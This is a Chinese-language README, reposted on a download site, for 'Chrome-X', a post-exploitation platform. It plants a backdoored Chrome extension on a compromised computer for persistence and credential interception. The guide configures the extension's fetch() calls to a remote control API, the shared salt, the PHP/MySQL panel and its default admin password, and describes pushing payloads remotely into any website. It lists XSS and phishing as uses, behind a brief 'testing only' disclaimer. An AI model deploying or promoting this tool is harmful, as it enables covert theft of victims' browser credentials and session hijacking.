Chrome-X 后渗透持久化与凭据监听 🚀
项目介绍 📝
Chrome-X 是一个用于后渗透持久化与票据监听的平台。
前言:创作思路来自前几天看到的6月14日即将要举行的腾讯安全沙龙其中的一个议题【后渗透新维度:利用Chrome插件后门实现持久化与凭据监听】,当时看到这个议题想了很久,于是用自己的思路制作出了Chrome-X工具,很期待腾讯安全沙龙举行以后,公开议题后看看大佬的思路。
功能特点 ✨
-
👥 每个插件用户可设置唯一值,以防接口暴漏被爆破 -
📊 后台可远程更新payload -
⚙️ 实现持久化与凭据监听 -
🔒 自定义payload可实现不同场景需求 -
📱 可实现植入任何网站
系统要求 🛠️
-
PHP 7.4 或更高版本 -
MySQL 5.7 或更高版本
插件端配置 📦
- background.js文件修改
修改3和4行为用户的用户名和盐
const USERNAME = 'test'; const SALT = '666';第19行 修改API
const response = await fetch(`https://127.0.0.1/api/getuser.php?hash=${hash}` - content.js文件修改
修改第64行API
const response = await fetch(`https://127.0.0.1/api/getuser.php?hash=${hash}`, {
控制端部署 📦
- 建议部署在宝塔 给所有文件权限 否则生成sessions会报错
- 配置数据库文件 /config/config.php
- 记得配置https 这是非常重要的 不然会导致https的站点无法生效
// MySQL数据库配置 define('DB_HOST', 'localhost'); define('DB_NAME', 'chrome_x'); define('DB_USER', 'chrome_x'); define('DB_PASS', 'chrome_x'); define('DB_CHARSET', 'utf8mb4');
1. 使用指南 🔑
- 访问
http://your-domain/ - 默认管理员账号:admin 密码:admin_hack 【修改密码请到数据库手动修改 或者下个版本修复问题】
- 首页添加用户 用户名和盐必须和插件的一致
- 设置payload 其他玩法自行发掘 如:XSS平台等
- 用户过多分辨不清 可添加备注
- 测试持久化劫持与凭据获取
常见问题 ❓
1. 登录失败
-
检查用户名和密码是否正确 -
确认数据库连接是否正常 -
检查是否给了文件权限 因为sessions需要生成文件
2. 修改密码失败
-
此功能是个bug 或在下个版本修复 -
请进入数据库手动修改
3. 用途建议
-
XSS -
钓鱼
工具思路 🔒
-
获取到PC权限后想进行后渗透和持久化凭据劫持,利用安装Chrome插件和控制端配置,可远程修改payload,凭据劫持配合XSS平台使用。 免责声明 🆘
本程序只允许测试使用,禁止用于违法犯罪活动,否则一切后果将自行承担。
版权声明:本站资源有的自互联网收集整理,如果侵犯了您的合法权益,请联系本站我们会及时删除。
本站资源仅供研究、学习交流之用,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担。
若本站对您有侵权行为,请联系QQ741559873,我们会及时删除
本文链接:奈斯资源网https://www.nicezyw.com/technical-information/1899/
许可协议:《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权
本站资源仅供研究、学习交流之用,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担。
若本站对您有侵权行为,请联系QQ741559873,我们会及时删除
本文链接:奈斯资源网https://www.nicezyw.com/technical-information/1899/
许可协议:《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权
评论0+